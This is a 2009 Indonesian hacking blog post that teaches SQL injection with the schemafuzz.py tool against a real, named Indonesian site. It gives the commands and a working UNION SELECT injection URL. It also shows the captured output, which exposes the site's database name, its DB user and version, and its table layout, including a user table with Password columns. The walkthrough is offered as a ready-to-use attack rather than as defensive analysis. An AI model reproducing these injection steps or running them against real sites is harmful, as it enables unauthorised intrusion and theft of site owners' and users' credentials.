Sunday, November 8, 2009

Cara Hacking Web Menggunakan Schemafuzz.py

1.Python
2.Schemafuzz
3.CMD

Dg cmd masuk ke folder tempat schemafuzz.py berada...
Awali pertintah dengan format:
schemafuzz.py -u "url target" --perintah
List perintah ada dibawah...


1.Cari target
Misal: http://www.ditplb.or.id/profile.php?id=1

2.Masukkan perintah untuk mencari colom
Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1"; --findcol
Maka keluar:
[+] URL: http://www.ditplb.or.id/profile.php?id=1--
[+]
Evasion Used: "+" "--"

[+] 20:36:29

[-] Proxy Not Given

[+] Attempting To find the number of columns...

[+] Testing: 0,1,2,
[+] Column Length is: 3

[+] Found null column at column #: 2

[+] SQLi URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2--

[+] darkc0de
URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de
[-] Done!



Berarti kita gunain
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de
untuk inject

3.Cari database dg command --dbs
Misal : schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--dbs
Maka keluar:
[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:39:32

[-] Proxy Not Given

[+] Gathering MySQL Server Configuration...

Database: t15618_plb
User: t15618_pl...@localhost

Version: 5.0.32-Debian_7etch8

[+] Showing all databases current user has access too!

[+] Number of Databases: 1

[0] t15618_plb


[-] 20:39:39

[-] Total URL Requests 3

[-] Done


keliatan kan nama databasenya ??? t15618_plb

4.Cari nama table dalam database
Misal: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D namadatabase
Jadinya: schemafuzz.py -u
"http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de";
--schema -D t15618_plb
Maka keluar:

[+] URL:
http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de--

[+] Evasion Used: "+" "--"

[+] 20:43:10

[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...

Database: t15618_plb

User: t15618_pl...@localhost

Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "t15618_plb"
[+] Number of Tables: 11
[Database]: t15618_plb
[Table: Columns]
[0]bukutamu: id,pengirim,email,pesan
[1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim
[2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan
[3]frm_kategori: id_kat,kategori
[4]kabupaten: ID_kab,ID_prop,Kabupaten
[5]pelatihan: ID,Pelatihan
[6]profile: ID_Profile,sinopsis,Profile
[7]propinsi: ID_prop,Propinsi
[8]sd: ID_sd,ID_1,SD,Detail
[9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email
[10]user: ID_user,UserID,Password,Keterangan,Admin
[-] 20:44:39
[-] Total URL Requests 43
[-] Done

DJ Site

Sunday, November 8, 2009

Cara Hacking Web Menggunakan Schemafuzz.py

0 komentar:

Translator To Your Language

Sponsored By:

Followers

Nostalgia!

From Me to You!

My Friend's Belong

Blog Archive

Labels

Hint This Blog

		DJ Site Life is good if you create a beautiful (My Dad) Maybe I was not successful like the Other people, but I would always try something that has not been tried by others ... (My English Lecturer = Mr. Subandi) For Me smart was not necessary, but Creative is necessary...
		Sunday, November 8, 2009 Home » Hacking » Cara Hacking Web Menggunakan Schemafuzz.py Cara Hacking Web Menggunakan Schemafuzz.py Email This BlogThis!Share to X Share to Facebook Share to Pinterest 1.Python 2.Schemafuzz 3.CMD Dg cmd masuk ke folder tempat schemafuzz.py berada... Awali pertintah dengan format: schemafuzz.py -u "url target" --perintah List perintah ada dibawah... 1.Cari target Misal: http://www.ditplb.or.id/profile.php?id=1 2.Masukkan perintah untuk mencari colom Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1"; --findcol Maka keluar: [+] URL: http://www.ditplb.or.id/profile.php?id=1-- [+] Evasion Used: "+" "--" [+] 20:36:29 [-] Proxy Not Given [+] Attempting To find the number of columns... [+] Testing: 0,1,2, [+] Column Length is: 3 [+] Found null column at column #: 2 [+] SQLi URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,2-- [+] darkc0de URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de [-] Done! Berarti kita gunain http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de untuk inject 3.Cari database dg command --dbs Misal : schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"; --dbs Maka keluar: [+] URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de-- [+] Evasion Used: "+" "--" [+] 20:39:32 [-] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: t15618_plb User: t15618_pl...@localhost Version: 5.0.32-Debian_7etch8 [+] Showing all databases current user has access too! [+] Number of Databases: 1 [0] t15618_plb [-] 20:39:39 [-] Total URL Requests 3 [-] Done keliatan kan nama databasenya ??? t15618_plb 4.Cari nama table dalam database Misal: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"; --schema -D namadatabase Jadinya: schemafuzz.py -u "http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de"; --schema -D t15618_plb Maka keluar: [+] URL: http://www.ditplb.or.id/profile.php?id=1+AND+1=2+UNION+SELECT+0,1,darkc0de-- [+] Evasion Used: "+" "--" [+] 20:43:10 [-] Proxy Not Given [+] Gathering MySQL Server Configuration... Database: t15618_plb User: t15618_pl...@localhost Version: 5.0.32-Debian_7etch8 [+] Showing Tables & Columns from database "t15618_plb" [+] Number of Tables: 11 [Database]: t15618_plb [Table: Columns] [0]bukutamu: id,pengirim,email,pesan [1]frm_daftarartikel: id_daf_art,id_kat,daftarartikel,pengirim [2]frm_detailartikel: id_det_art,id_kat,id_daf_art,detailartikel,keterangan [3]frm_kategori: id_kat,kategori [4]kabupaten: ID_kab,ID_prop,Kabupaten [5]pelatihan: ID,Pelatihan [6]profile: ID_Profile,sinopsis,Profile [7]propinsi: ID_prop,Propinsi [8]sd: ID_sd,ID_1,SD,Detail [9]sekolah: ID_sek,ID_prop,ID_kab,Sekolah,Alamat,Telp,Email [10]user: ID_user,UserID,Password,Keterangan,Admin [-] 20:44:39 [-] Total URL Requests 43 [-] Done Share Tweet blogger widgets Diposkan oleh DJ Site \| Blogger Serabutan di 11:21 AM Label: Hacking 0 komentar: Post a Comment Subscribe to: Post Comments (Atom)	Home It's Me! More Detail? My Social Networking ~~Add My Facebook~~ Follow My Tweet Join Me on Google+ Follow Me On Pinterest Follow Me On Instagram My Friend's Banner FEEDS Disclaimers Privacy Policy Mobile Versions Sitemap Blogger Certified Angkringan (Forum) Translator To Your Language Sponsored By: Smadav Antivirus Indonesia Smadav adalah antivirus untuk proteksi tambahan komputer Anda, proteksi total USB Flashdisk, dan pembersihan virus yang menyebarluas. LG Electronics Indonesia Hidup bukanlah sekedar memiliki. Untuk apa memiliki sebuah perangkat teknologi terkini, tapi Anda tidak bisa menikmatinya? Dengan LG, Anda bisa merasakan bedanya. XL Axiata Mulai beroperasi secara komersial sejak 8 Oktober 1996, XL Axiata menjadi yang terbaik di wilayah Asia, dan dimiliki secara mayoritas oleh Axiata Group Berhad dengan saham sebesar 66,43% dan selebihnya menjadi milik publik dengan saham sebesar 33,57%. Nexian - Next Generation Nexian dikenal sebagai vendor ponsel dengan produknya yang bersahabat dengan kantong. Tidak hanya murah. NGONOO.COM NGONOO adalah situs Media Online yang menyajikan informasi social media, perkembangan teknologi, budaya digital, tips trik, hiburan, olahraga, otomotif dan sepakbola. PHILIPS Indonesia Royal Philips of the Netherlands is a diversified technology company, focused on improving people’s lives through meaningful innovation in the areas of Healthcare, Consumer Lifestyle and Lighting. Higienis Indonesia Specialized in providing quality health and hygiene solutions. Lazada.co.id Online Shopping Mall Terkemuka di Indonesia. Waiting List Menunggu donatur lain yang ingin bekerjasama baik dalam bentuk placement article ataupun Product Review. E-mail: djnand.dj@gmail.com Followers Nostalgia! Just IPA 3 Kadang jadi bagian dari kelas buangan jauh lebih seru dari pada jadi bagian dari kelas yang isinya anak-anak "Jenius". Indie-Mading At TRISAKTI University Sekali seumur hidup masuk kampus elite nyewa Angkot Cikokol haha. Ending-Champions In TRISAKTI University Salah satu kenangan termanis sebelum lulus SMA. From Me to You! ON\|OFF Forum Angkringan kecil-kecilan buat sedulur sekalian. IDOLA.ID Tempat saya nulis postingan-postingan pribadi yang nggak sempet saya publish di blog ini. Blogger Serabutan Tempat saya nulis macem-macem Serabutan.NET Tempat saya ngebahas tentang home design. FloodLove Tempat saya nulis macem-macem juga djnand @Ameblo (Ameba) Japanese Blog Platform. DJ Site @BlogDetik Mengenang sebuah platform blog yang kini dimatikan detik.com. Blog saya dulunya beralamat di: https://djsite.blogdetik.com/ Cookies Tempat bahas tekno. Sejarah Bangsa Tempat saya belajar sejarah tentang bangsa tercinta ini. The Movie's Tempat saya nulis review film yang bakalan rilis. Private E-Book Kumpulan E-book pribadi. Hebring Indonesia Animasi Lokal rasa Disney. Sing Your Lyrics Lirik lagu Indonesia. Lyrics Serabutan Lirik lagu luar, dulunya Go Lyrics. Music Serabutan My Music Library. Lainnya... Belum kepikiran untuk nambah haha... My Friend's Belong OJIENLING Krishna Balagita Diponegoro Adventure Djangan Pakies? Sukadi.Net Adit Belantara Indonesia? Nophie? De Bolokurowo[Punya Ica] Aku Bercerita Andri Site Umy Diary Blog-Q jablay... Penghuni60 Cerita Nyata dan Tidak Nyata Archv3nture Etam Grecek Dharma Ku Nanty Tito's Weblog Trenggalek Jelita Desktop Wallpaper, Free Wallpaper Yudha Blog Bukan Lagi Iseng Aja DAN semua \| Adwamm Blog Amatiran Ruang CINTA Seorang PUGUH Ukhra Zone Trik Dasar Impossible Is Nothing Blog Archive ► 2024 (1) ► April (1) ► 2023 (4) ► October (2) ► June (2) ► 2022 (3) ► October (1) ► July (1) ► February (1) ► 2021 (2) ► July (1) ► February (1) ► 2020 (1) ► February (1) ► 2019 (2) ► December (1) ► November (1) ► 2018 (10) ► December (1) ► November (1) ► August (2) ► May (1) ► January (5) ► 2017 (7) ► November (1) ► June (1) ► May (1) ► April (2) ► February (1) ► January (1) ► 2016 (18) ► December (1) ► November (1) ► October (1) ► September (2) ► July (3) ► June (1) ► April (3) ► March (1) ► February (1) ► January (4) ► 2015 (8) ► December (1) ► October (3) ► April (2) ► March (2) ► 2014 (25) ► November (3) ► October (2) ► September (8) ► July (2) ► April (2) ► March (2) ► January (6) ► 2013 (64) ► December (8) ► November (1) ► October (1) ► September (6) ► August (5) ► July (12) ► June (9) ► May (1) ► April (6) ► March (5) ► February (5) ► January (5) ► 2012 (54) ► November (4) ► October (4) ► September (2) ► August (5) ► June (5) ► May (3) ► April (9) ► March (7) ► February (10) ► January (5) ► 2011 (217) ► December (7) ► November (20) ► October (11) ► September (9) ► August (29) ► July (27) ► June (13) ► May (13) ► April (22) ► March (15) ► February (24) ► January (27) ► 2010 (344) ► December (19) ► November (24) ► October (32) ► September (38) ► August (32) ► July (41) ► June (37) ► May (30) ► April (26) ► March (17) ► February (24) ► January (24) ▼ 2009 (111) ► December (49) ▼ November (26) Distro linux Terbaik Kategori Hacking How To Increase Google Ranking Creating the logo of the game characters How To Remove Virus Different superficial? CARA JEBOL SERVER KALAU YM/IM KITA DIBLOCK ADMIN Lisensi & Aktivasi Windows TIPS & TRIK DOWNLOAD VIDEO OR MUSIC DARI YAHOO LAUNCH Mencari Buku Dengan Google CARA MEMBASMI VIRUS "KANGEN" HOSTING GRATIS DI GOOGLE PAGES? Cara Hacking Web 2 Cara Hacking Web Menggunakan Schemafuzz.py Hacker DNA (Terjemahan dari How To Become A Hacker... Hacker DNA Nirmana Typography (Tipografi) Choosing Colors Tips (Tips Memilih Warna) Warna Art Sculpture (Seni Patung) Performance art (Seni Pertunjukan) Contemporary Art (Seni Kontemporer) Ceramic art (Seni Keramik) Art installation (Seni instalasi) Arts (Seni) Industrial Design (Desain industri) Architecture (Arsitektur) ► October (24) ► September (12) Labels (dot) HOST (1) #IndonesiaUnite (6) #PRAYFORJAKARTA (1) #SupportGaruda (1) #UntukIbu (1) 48's Family (2) 5cm (1) A Tribute (8) Acer ICONIA W510 (1) Ahok (2) Air track for home (1) AKB48 (1) Android (33) Android Custom ROM (18) Android ROM (17) Andromax U2 EG98 (1) Andromax-i (2) Angkringan (2) ASUS (1) AWARD (7) Ayo Indonesia Bisa (1) Battery Power (1) BBM (1) Berkat Ngeblog (2) BlackBerry (1) BlackBerry Curve Gemini 8520 (1) Blogging Tips (26) Buku (1) Cara Membuat Blog (1) Cerita Kehidupan (13) Cinema 3D TV (1) CM10 (3) CM10.1 (2) CM7 (2) CM9 (1) CMS (6) Daftar Blog Gratis (1) Debat In DJ Site (2) Decorative Jotun Indonesia (1) DecorativeJI (1) Demo Cyber (1) Desain Seni Rupa (10) Domain (1) Earth Hour (4) FLOWER FLOWER (1) Freeware (65) Friendship (1) Give Away (2) Global Peace Festival (1) Google (1) Google AdSense (AdChoices) (1) Google's Birthday (2) Google's Panda (2) Hacking (21) Happy New Year 2011 (1) Happy New Year 2012 (2) Happy New Year 2016 (1) Hari Blogger Nasional (4) Hari Bumi (2) Hari Kesehatan Mental Sedunia (2) Holiday (1) Hujan (1) Ibu (1) Iconia PC tablet dengan Windows 8 (1) iDevice (1) IDwebhost.com (1) IDWS (1) Iklan (2) Iklan Mengagumkan (1) In Memoriam Of (1) Indonesiaku (61) Indowebster (1) Infaq Online (1) Info Technology (500) Informasi (1) Inspirasi Ngawur (1) Introducing Of Graphic Design (19) iOS (4) iOS 7 (1) iOS7 Beta (1) iPhone 4S (2) iPhone 5 (1) IT Motivation's (20) Jailbreak Untethered (1) Japanese (5) Jogja (2) JOTUN (1) Jual Bibit Tanaman Berkualitas (1) Jual HP (1) Kaskus (1) Keiko Kitagawa (1) kesehatan (1) Kesehatan Mental (1) Keyword tembakan (2) Kisah Hidup (2) Kopdar (2) Kota Tangerang (1) Lebaran (3) LED 3D TV (1) Lenovo (1) LG OPTIMUS L1 II E410 (6) LG Optimus ME (5) License (2) Love (1) Mari Nyanyi (1) Matras Udara (1) Media.Net (1) Mito A90 (1) Mitra Bibit (1) Moto E3 Power (1) Motorola (1) MOVIE (13) MUSIC (12) My-Ebook (1) Nescafe Dolce Gusto (1) Netatmo Welcome (2) Ngeblog (3) NGONOO (1) On\|Off Event 2011 (2) Open Source (1) OPPO Find Muse R821 (1) Page Rank (2) Panasonic Gobel Indonesia (1) PayOut (1) Pemberitahuan (1) PEMILU (3) Penerangan Jalan Umum (PJU) (1) Pengalaman Pribadi (5) Pesta Blogger (9) Philips (1) Philips Aquatouch (1) Piala Dunia (6) Plugin Wordpress (1) postaday20113 (198) postaweek20113 (198) Program Kampung Terang (1) Psikologi (7) Question (1) Rapid Charging (1) ReQuest (1) Review Untuk Sahabat (3) Samsung Galaxy Y (10) SEA GAMES Palembang (1) Sedekah Online (1) Selah (78) Sepatu (1) Sertifikat Blogger (4) Shaver (1) Situs Media Warga (1) Skyline (1) small inflatable tumble track (1) Smart Camera (1) Smart Indoor Security Camera (1) Smart TV (1) Smartphone Android Terbaik (1) Spoiler (1) Tekno (1) Tempat Nongkrong (1) The AIU (1) ThiPos (Thinking Positive) (1) Tips N Trik YaNg Harus Lo Tau' (25) TokoBagus.Com (1) Tutorial CorelDraw (7) Tutorial Ms. Office (3) Tutorial VB 6.0 (1) TV Series (1) UUD Blogging DJ site (2) Vaksinasi (1) Wakaf Online (1) wholesale Airtrack (1) Windows XP (1) World Mental Health Day (2) World Sleep Day (1) WWF (2) Yahoo Bing Network (1) Yogyakarta (1) YouiDraw (1) YUI (33) Zakat Online (1) ZenFone (1) Ziddu.Com (1) Hint This Blog DJ Site - Since 2009 Until Now Blog Content by Ferdinand is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. Based on a work at https://dj-site.blogspot.co.id/. Themes by blogcrowds. Design With ❤ for Blogger Serabutan